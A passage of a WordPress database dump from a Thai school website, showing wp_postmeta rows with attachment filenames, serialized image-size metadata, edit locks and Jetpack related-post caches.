";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6874, 2768, '_thumbnail_id', '2769'),
(6878, 2768, '_hide_featured', NULL),
(6879, 2768, '_wpas_done_all', '1'),
(6884, 2760, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575501053;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5197;}i:1;a:1:{s:2:\"id\";i:6316;}i:2;a:1:{s:2:\"id\";i:4029;}}}}'),
(6885, 2764, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575695524;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4762;}i:1;a:1:{s:2:\"id\";i:4157;}i:2;a:1:{s:2:\"id\";i:5291;}}}}'),
(6886, 2768, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575166628;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6119;}i:1;a:1:{s:2:\"id\";i:5026;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(6887, 2756, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574475930;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5979;}i:1;a:1:{s:2:\"id\";i:4881;}i:2;a:1:{s:2:\"id\";i:4182;}}}}'),
(6888, 2752, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575679609;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6314;}i:1;a:1:{s:2:\"id\";i:6308;}i:2;a:1:{s:2:\"id\";i:5291;}}}}'),
(6889, 2740, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575385758;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4029;}i:1;a:1:{s:2:\"id\";i:4934;}i:2;a:1:{s:2:\"id\";i:5939;}}}}'),
(6890, 2723, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575385478;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4735;}i:1;a:1:{s:2:\"id\";i:4687;}i:2;a:1:{s:2:\"id\";i:4073;}}}}'),
(6891, 2744, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575303875;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:6328;}i:2;a:1:{s:2:\"id\";i:4884;}}}}'),
(6892, 2736, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575569072;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4735;}i:1;a:1:{s:2:\"id\";i:4166;}i:2;a:1:{s:2:\"id\";i:4951;}}}}'),
(6893, 2775, '_wp_attached_file', '2018/05/อวท.26.docx'),
(6894, 2778, '_edit_lock', '1527478762:1'),
(6895, 2778, '_edit_last', '1'),
(6896, 2779, '_wp_attached_file', '2018/05/แบบประเมิน-การพัฒนาสมาชิกให้เป็นคนดี-คนเก่ง-และมีความสุข.docx'),
(6897, 2780, '_wp_attached_file', '2018/05/แบบฟอร์มการเขียนโครงการและการจัดทำรูปเล่ม.doc'),
(6898, 2781, '_wp_attached_file', '2018/05/การจัดทำรูปเล่มโครงการ.docx'),
(6899, 2778, '_hide_featured', NULL),
(6902, 2786, '_wp_attached_file', '2018/05/รองอานุภาพ-1.jpg'),
(6903, 2786, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:636;s:6:\"height\";i:795;s:4:\"file\";s:44:\"2018/05/รองอานุภาพ-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"รองอานุภาพ-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"รองอานุภาพ-1-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:44:\"รองอานุภาพ-1-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6904, 2787, '_wp_attached_file', '2018/05/อ.ฉัตรเฉลิม.png'),
(6905, 2787, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:945;s:6:\"height\";i:1181;s:4:\"file\";s:43:\"2018/05/อ.ฉัตรเฉลิม.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"อ.ฉัตรเฉลิม-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"อ.ฉัตรเฉลิม-240x300.png\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"อ.ฉัตรเฉลิม-768x960.png\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"อ.ฉัตรเฉลิม-819x1024.png\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:43:\"อ.ฉัตรเฉลิม-240x300.png\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6906, 2788, '_wp_attached_file', '2018/05/นายก.jpg'),
(6907, 2788, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:945;s:6:\"height\";i:1181;s:4:\"file\";s:24:\"2018/05/นายก.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"นายก-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"นายก-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"นายก-768x960.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"นายก-819x1024.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"นายก-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:12:\"นายก\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6908, 2789, '_wp_attached_file', '2018/05/รอง-2.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(6909, 2789, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:945;s:6:\"height\";i:1181;s:4:\"file\";s:23:\"2018/05/รอง-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"รอง-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"รอง-2-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"รอง-2-768x960.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"รอง-2-819x1024.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"รอง-2-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:11:\"รอง 2\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6910, 2790, '_wp_attached_file', '2018/05/28-5-2561-11-05-34.jpg'),
(6911, 2790, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:835;s:6:\"height\";i:630;s:4:\"file\";s:30:\"2018/05/28-5-2561-11-05-34.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"28-5-2561-11-05-34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"28-5-2561-11-05-34-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"28-5-2561-11-05-34-768x579.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:579;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"28-5-2561-11-05-34-398x300.jpg\";s:5:\"width\";i:398;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6914, 2797, '_wp_attached_file', '2018/05/30-5-2561-9-22-41.jpg'),
(6915, 2797, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/05/30-5-2561-9-22-41.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"30-5-2561-9-22-41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6916, 2799, '_wp_attached_file', '2018/05/30-5-2561-9-51-29.jpg'),
(6917, 2799, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/05/30-5-2561-9-51-29.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"30-5-2561-9-51-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6920, 2806, '_wp_attached_file', '2018/05/30-5-2561-10-26-55.jpg'),
(6921, 2806, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:838;s:6:\"height\";i:589;s:4:\"file\";s:30:\"2018/05/30-5-2561-10-26-55.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"30-5-2561-10-26-55-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"30-5-2561-10-26-55-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"30-5-2561-10-26-55-768x540.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:540;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"30-5-2561-10-26-55-400x281.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6922, 2809, '_edit_lock', '1538463471:3'),
(6923, 2809, '_edit_last', '3'),
(6926, 2809, '_hide_featured', NULL),
(6927, 2813, '_wp_attached_file', '2018/05/5-2-2561-11-03-33.jpg'),
(6928, 2813, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:501;s:6:\"height\";i:335;s:4:\"file\";s:29:\"2018/05/5-2-2561-11-03-33.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-03-33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-03-33-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-03-33-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6929, 2814, '_wp_attached_file', '2018/05/15345314.jpg'),
(6930, 2814, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:5184;s:6:\"height\";i:3456;s:4:\"file\";s:20:\"2018/05/15345314.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"15345314-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"15345314-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"15345314-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"15345314-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"15345314-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1438731213\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6931, 2815, '_wp_attached_file', '2018/05/30-5-2561-14-14-12.jpg'),
(6932, 2815, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:56;s:4:\"file\";s:30:\"2018/05/30-5-2561-14-14-12.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"30-5-2561-14-14-12-150x56.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:56;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6933, 2817, '_wp_attached_file', '2018/05/30-5-2561-14-21-41.jpg'),
(6934, 2817, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:815;s:6:\"height\";i:261;s:4:\"file\";s:30:\"2018/05/30-5-2561-14-21-41.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-21-41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"30-5-2561-14-21-41-300x96.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-21-41-768x246.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-21-41-400x128.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6939, 2821, '_wp_attached_file', '2018/05/30-5-2561-14-28-08.jpg'),
(6940, 2821, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:837;s:6:\"height\";i:287;s:4:\"file\";s:30:\"2018/05/30-5-2561-14-28-08.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-28-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-28-08-300x103.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-28-08-768x263.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"30-5-2561-14-28-08-400x137.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6943, 2824, '_wp_attached_file', '2018/05/42566265256526.jpg'),
(6944, 2824, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:540;s:6:\"height\";i:44;s:4:\"file\";s:26:\"2018/05/42566265256526.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"42566265256526-150x44.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"42566265256526-300x24.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:24;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"42566265256526-400x33.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6945, 2825, '_wp_attached_file', '2018/05/30-5-2561-14-52-27.jpg'),
(6946, 2825, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:229;s:6:\"height\";i:44;s:4:\"file\";s:30:\"2018/05/30-5-2561-14-52-27.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"30-5-2561-14-52-27-150x44.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6947, 2835, '_edit_lock', '1527741046:3'),
(6948, 2835, '_edit_last', '3'),
(6950, 2837, '_wp_attached_file', '2018/05/ตารางเวร-เดือนมิถุนายน-2561-1.pdf'),
(6954, 2835, '_hide_featured', NULL),
(6955, 2835, '_wpas_done_all', '1'),
(6956, 2835, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575382843;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:4006;}}}}'),
(6957, 2841, '_edit_lock', '1527751698:3'),
(6958, 2841, '_edit_last', '3'),
(6959, 2842, '_wp_attached_file', '2018/05/ครุภัณฑ์-จำนวน-3-รายการ-คอมพิวเตอร์ฯ.pdf'),
(6960, 2843, '_wp_attached_file', '2018/05/ครุภัณฑ์-จำนวน-2-รายการ-ช่างกล.pdf'),
(6964, 2841, '_hide_featured', NULL),
(6965, 2841, '_wpas_done_all', '1'),
(6966, 2846, '_edit_lock', '1527752183:3'),
(6967, 2846, '_edit_last', '3'),
(6971, 2846, '_hide_featured', NULL),
(6972, 2846, '_wpas_done_all', '1'),
(6975, 2841, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575137925;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(6976, 2846, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575281453;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(6977, 2849, '_edit_lock', '1527752738:3'),
(6978, 2849, '_edit_last', '3'),
(6979, 2850, '_wp_attached_file', '2018/05/33662617_590103491365843_4906639912477917184_o.jpg'),
(6980, 2850, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/05/33662617_590103491365843_4906639912477917184_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"33662617_590103491365843_4906639912477917184_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"33662617_590103491365843_4906639912477917184_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"33662617_590103491365843_4906639912477917184_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"33662617_590103491365843_4906639912477917184_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"336626